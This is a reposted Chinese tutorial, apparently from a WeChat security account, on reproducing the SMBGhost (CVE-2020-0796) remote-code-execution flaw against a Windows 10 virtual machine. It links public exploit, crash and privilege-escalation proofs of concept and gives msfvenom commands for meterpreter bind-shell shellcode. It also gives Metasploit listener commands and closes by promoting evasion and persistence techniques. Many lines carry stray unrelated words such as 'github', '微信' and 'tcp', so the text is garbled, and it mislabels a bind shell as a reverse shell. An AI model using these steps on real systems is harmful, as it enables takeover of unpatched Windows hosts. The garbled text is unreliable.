CVE-2020-0796:微软 SMBv3 协议RCE复现

简介python

SMB(全称是Server Message Block)是一个协议名,它能被用于Web链接和客户端与服务器之间的信息沟通。git

漏洞概述github

(CVE-2020-0796 SMBGhost)该漏洞是因为SMBv3协议在处理恶意的压缩数据包时出错所形成的,它可以让远程且未经身份验证的攻击者在目标系统上执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。shell

影响版本windows

适用于32位系统的Windows 10版本1903服务器

Windows 10 1903版(用于基于x64的系统)微信

Windows 10 1903版(用于基于ARM64的系统)app

Windows Server 1903版(服务器核心安装)tcp

适用于32位系统的Windows 10版本1909ide

Windows 10版本1909(用于基于x64的系统)

Windows 10 1909版(用于基于ARM64的系统)

Windows Server版本1909(服务器核心安装)

这里是我使用的Windows10版本的靶机

环境搭建
Kali虚拟机以及windows10虚拟机
可在虚拟机中搭建win10系统来进行复现。迅雷连接:

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/

使用扫描工具来验证是否由该漏洞

https://github.com/ollypwn/SMBGhost

能够看到该版本是具备SMBv3 RCE漏洞的

漏洞复现
EXP地址:

https://github.com/chompie1337/SMBGhost_RCE_PoC

该exp使用环境为python3
下载完成后将该exp放到Kali虚拟机中
启动msf,使用msf生成shellcode
命令为:

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

若是不输入为txt就使用这一条

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python

执行该命令后会在同目录下生成一个shellcode.txt,将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD保存便可。

替换到exploit.py里面。注意这里MSF给出的是buf 在exploit.py里面是USER_PAYLOAD 这个须要修改一下

修改好了exp文件以后,在MSF上面设置监听

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 8888

set rhost 192.168.8.138

run

使用exp对windows进行反弹shell。这里成功了而且没有蓝屏的现象

蓝屏的POC。这个POC能够把由这个漏洞的windows10系统打到蓝屏

https://github.com/eerykitty/CVE-2020-0796-PoC

在执行的时候须要注意要安装一些包和注意路径的问题

本地提权POC

https://github.com/danigargu/CVE-2020-0796

编译好了的版本以下:

https://github.com/danigargu/CVE-2020-0796/releases


渗透测试 红队攻防 免杀 权限维持 等等技术 

及时分享最新漏洞复现以及EXP 国内外最新技术分享!!!

进来一块儿学习吧



本文分享自微信公众号 - 黑白天(li0981jing)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。

相关文章
相关标签/搜索